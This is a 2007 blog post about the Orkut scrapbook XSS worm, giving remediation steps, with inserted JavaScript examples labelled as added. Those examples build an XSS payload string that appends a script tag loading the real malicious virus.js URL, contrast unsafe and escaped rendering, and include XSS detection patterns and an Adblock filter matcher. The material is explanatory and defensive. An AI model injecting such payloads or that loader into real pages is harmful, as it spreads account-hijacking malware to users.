Tuesday, December 18, 2007

Watch out for orkut spam! virus!

I got fooled into spreading a "scrapbook" spam to all my friends on orkut. I received a funny-looking message from a friend of mine which looked like this:

2008 vem ai... que ele comece mto bem para vc

While the visible text looks like gibberish (it is Portuguese, loosely translated as "2008 is coming... may it begin really well for you"), the scrap carries an invisible piece of JavaScript embedded in it (I have scraped the script from the HTML source but don't want to post it here). What it basically does is execute a script located at http://files.myopera.com/virusdoorkut/files/virus.js (do not try to open this file).

If you get such a message in your orkut scrapbook, please do not reply to that scrap, as doing so executes the script.
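
To make the mechanism concrete, here is an added example (not code from the original post, and not the worm's actual payload): a scrap body rendered into page markup without escaping, the same rendering with output escaping, and a small triage helper that lists the external scripts a raw scrap would pull in. The function names, the "from" field and the scrap markup are constructed for illustration; only the loader URL is the one named above.

```javascript
// Added example (not part of the original post): what a scrapbook XSS looks
// like at the rendering layer and how output escaping stops it. Function
// names, the "from" field and the scrap markup are assumptions; the loader
// URL is the one the post names.

// Visible text of the scrap, as shown in the post.
const SCRAP_TEXT = '2008 vem ai... que ele comece mto bem para vc';

// Constructed payload: the visible text with a script loader appended. The
// worm's real injected markup is not reproduced here.
const SCRAP_HTML = SCRAP_TEXT +
  '<script src="http://files.myopera.com/virusdoorkut/files/virus.js"></script>';

// Vulnerable rendering (the bug class): the untrusted scrap body is pasted
// into page markup as-is, so any tag the sender wrote becomes live DOM.
function renderScrapUnsafe(from, body) {
  return '<div class="scrap"><b>' + from + '</b>: ' + body + '</div>';
}

// Escape the five HTML metacharacters so untrusted input can only be text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: every untrusted field goes through escapeHtml on output.
function renderScrapSafe(from, body) {
  return '<div class="scrap"><b>' + escapeHtml(from) + '</b>: ' + escapeHtml(body) + '</div>';
}

// Triage helper for scraps already stored: list the external script URLs a
// raw body would load if it were rendered unescaped.
function findScriptLoaders(html) {
  const urls = [];
  const re = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  let m;
  while ((m = re.exec(html)) !== null) urls.push(m[1]);
  return urls;
}

// Cheap indicator for the same triage: script or iframe tags, inline event
// handlers, or javascript: URLs. Expect some false positives on plain text.
function looksLikeXss(html) {
  return /<script\b|<iframe\b|\son[a-z]+\s*=|javascript:/i.test(html);
}

// Stand-alone demo.
console.log(findScriptLoaders(SCRAP_HTML));
console.log(renderScrapUnsafe('friend', SCRAP_HTML));
console.log(renderScrapSafe('friend', SCRAP_HTML));
```

The point of the pair of render functions is that the fix belongs on output, not in a blocklist: the escaped version turns the whole payload into harmless text regardless of what tag the attacker used, while the detector only helps you find scraps that are already stored.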

I'd also strongly advise everyone to change their Password.

Update 1: Here's some technical information which says this is an XSS attack.

Update 2: Here's what you should do to protect against this virus (information from a conversation with a friend at Google):
  1. If you are using Firefox with Adblock, add "*virus.js" to its list of filters. That blocks the browser from fetching the script, so it cannot run. Note that this only stops the current payload from loading; the injection in the scrap itself remains until orkut fixes it on the server side.
  2. Change your "Google Account" password.
  3. You may have been temporarily banned by Orkut. This is a standard response by the system, as it detected you sending a scrap to all your contacts. Don't worry. Just stay away from Orkut for 5 to 6 hours and log in again. You should see a new community called "Infectados pelo Vírus do Orkut" ("Infected by the Orkut Virus", also Portuguese, if you were wondering) appear in your "communities". Leave that community. If you can't, wait another 5-6 hours and retry.
  4. Just to be sure, run a virus scan of your computer.
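
As an added example (not from the original post), here is a small matcher for the classic Adblock wildcard filter syntax that step 1 relies on, used to check what "*virus.js" does and does not block. It implements only the '*' wildcard and the '|' / '||' anchors, and approximates '||' as "any scheme, then the host or one of its subdomains"; apart from the loader URL named above, the filters and URLs are constructed for illustration.

```javascript
// Added example (not part of the original post): a minimal Adblock-style
// filter matcher. Only '*', '|' and '||' are implemented; '||' is an
// approximation of Adblock's domain anchor. The loader URL is the one the
// post names; the other URLs and the tighter filter are constructed.

// Convert one filter line to a case-insensitive RegExp.
function filterToRegExp(filter) {
  let f = filter.trim();
  let prefix = '';
  let suffix = '';
  if (f.startsWith('||')) {
    // Domain anchor: match the host (or any subdomain of it) after the scheme.
    prefix = '^[a-z][a-z0-9+.-]*://([^/?#]*\\.)?';
    f = f.slice(2);
  } else if (f.startsWith('|')) {
    prefix = '^'; // anchored at the start of the URL
    f = f.slice(1);
  }
  if (f.endsWith('|')) {
    suffix = '$'; // anchored at the end of the URL
    f = f.slice(0, -1);
  }
  // Everything except '*' is literal; '*' becomes '.*'. Unanchored filters
  // match anywhere in the URL, as in Adblock.
  const body = f
    .split('*')
    .map((part) => part.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'))
    .join('.*');
  return new RegExp(prefix + body + suffix, 'i');
}

// True if any filter in the list matches the URL.
function isBlocked(url, filters) {
  return filters.some((f) => filterToRegExp(f).test(url));
}

// The loader the post identifies, plus two constructed URLs for comparison.
const LOADER_URL = 'http://files.myopera.com/virusdoorkut/files/virus.js';
const ORKUT_PAGE = 'http://www.orkut.com/Scrapbook.aspx';   // constructed
const UNRELATED_JS = 'http://example.com/js/antivirus.js';  // constructed

// The filter from the post, and a tighter alternative anchored to the host
// and path that served the payload (constructed).
const BROAD_FILTER = ['*virus.js'];
const TIGHT_FILTER = ['||files.myopera.com/virusdoorkut/'];

console.log('broad filter blocks loader:', isBlocked(LOADER_URL, BROAD_FILTER));
console.log('broad filter also blocks unrelated antivirus.js:', isBlocked(UNRELATED_JS, BROAD_FILTER));
console.log('tight filter blocks loader:', isBlocked(LOADER_URL, TIGHT_FILTER),
  'and unrelated:', isBlocked(UNRELATED_JS, TIGHT_FILTER));
```

The comparison shows the trade-off in the recommended filter: "*virus.js" does stop the loader, but it also blocks any script anywhere whose name ends in virus.js, whereas a host-and-path anchored filter only blocks the location that actually served the payload. Either way the filter stops the browser from fetching the script; it does nothing about the scrap that is already sitting in your scrapbook.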
Update 3: As antrix pointed out in the comments, this vulnerability has been fixed. I was able to log in to my orkut account and leave the "Infectados pelo Vírus do Orkut" community. That community had 650,000+ members when I left it. Phew!


  1. Dude,

    I got fooled the same way!! :-(

  2. Hey, thanks for the link. The vulnerability has been fixed. I've updated my post with more info.